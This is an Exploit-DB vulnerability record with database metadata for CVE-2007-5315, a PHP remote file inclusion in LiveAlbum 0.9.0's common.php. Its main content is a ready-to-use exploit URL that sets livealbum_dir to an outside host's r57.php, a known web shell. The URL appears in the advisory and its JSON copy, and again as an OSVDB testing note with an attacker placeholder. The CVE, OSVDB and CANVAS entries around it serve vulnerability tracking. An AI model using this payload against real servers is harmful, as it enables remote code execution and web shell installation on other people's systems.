ID EDB-ID:4503
Type exploitdb
Reporter S.W.A.T.
Modified 2007-10-08T00:00:00
Description
LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability. CVE-2007-5315. Webapps exploit for php platform
\\\|///
\\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : LiveAlbum 0.9.0
Download : http://downloads.sourceforge.net/livealbum/livealbum-0.9.1.tar.bz2
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
+---------------------------------------------------------------------------------------------+
Vuln :
http://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?
+---------------------------------------------------------------------------------------------+
# milw0rm.com [2007-10-08]
{"id": "EDB-ID:4503", "type": "exploitdb", "bulletinFamily": "exploit", "title": "LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability", "description": "LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability. CVE-2007-5315. Webapps exploit for php platform", "published": "2007-10-08T00:00:00", "modified": "2007-10-08T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4503/", "reporter": "S.W.A.T.", "references": [], "cvelist": ["CVE-2007-5315"], "lastseen": "2016-01-31T21:04:57", "viewCount": 5, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-01-31T21:04:57", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5315"]}, {"type": "canvas", "idList": ["LIVEALBUM_INCLUDE"]}, {"type": "osvdb", "idList": ["OSVDB:37618"]}], "modified": "2016-01-31T21:04:57", "rev": 2}, "vulnersScore": 7.7}, "sourceHref": "https://www.exploit-db.com/download/4503/", "sourceData": " \\\\\\|///\n \\\\ - - // Xmors Underground Group\n ( @ @ )\n ----oOOo--(_)-oOOo--------------------------------------------------\n Portal : LiveAlbum 0.9.0\n Download : http://downloads.sourceforge.net/livealbum/livealbum-0.9.1.tar.bz2\n\t Author : S.W.A.T.\n\t HomePage : wWw.XmorS.CoM\n\t Type : Remote File Inclusion\n ----ooooO-----Ooooo--------------------------------------------------\n ( ) ( )\n \\ ( ) /\n \\_) (_/\n\n\n\n+---------------------------------------------------------------------------------------------+\n\nVuln :\n\nhttp://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?\n\n\n+---------------------------------------------------------------------------------------------+\n\n# milw0rm.com [2007-10-08]\n", "osvdbidlist": ["37618"]}
{"cve": [{"lastseen": "2020-10-03T11:45:54", "description": "PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the livealbum_dir parameter.", "edition": 3, "cvss3": {}, "published": "2007-10-09T21:17:00", "title": "CVE-2007-5315", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5315"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:softpedia:livealbum:0.9.0"], "id": "CVE-2007-5315", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5315", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:softpedia:livealbum:0.9.0:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "cvelist": ["CVE-2007-5315"], "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Manual Testing Notes\nhttp://[TARGET]/[PATH]/common.php?livealbum_dir=http://[attacker]/r57.php?\n## References:\n[Secunia Advisory ID:27139](https://secuniaresearch.flexerasoftware.com/advisories/27139/)\nOther Advisory URL: http://milw0rm.com/exploits/4503\nISS X-Force ID: 37028\nFrSIRT Advisory: ADV-2007-3446\n[CVE-2007-5315](https://vulners.com/cve/CVE-2007-5315)\n", "edition": 1, "modified": "2007-10-08T00:00:00", "published": "2007-10-08T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37618", "id": "OSVDB:37618", "title": "LiveAlbum common.php livealbum_dir Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5315"], "description": "**Name**| livealbum_include \n---|--- \n**CVE**| CVE-2007-5315 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| LiveAlbum remote file include \n**Notes**| CVSS: 6.8 \nRepeatability: Infinite \nVENDOR: LiveAlbum \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5315 \nCVE Name: CVE-2007-5315 \n\n", "edition": 2, "modified": "2007-10-09T21:17:00", "published": "2007-10-09T21:17:00", "id": "LIVEALBUM_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/livealbum_include", "type": "canvas", "title": "Immunity Canvas: LIVEALBUM_INCLUDE", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}
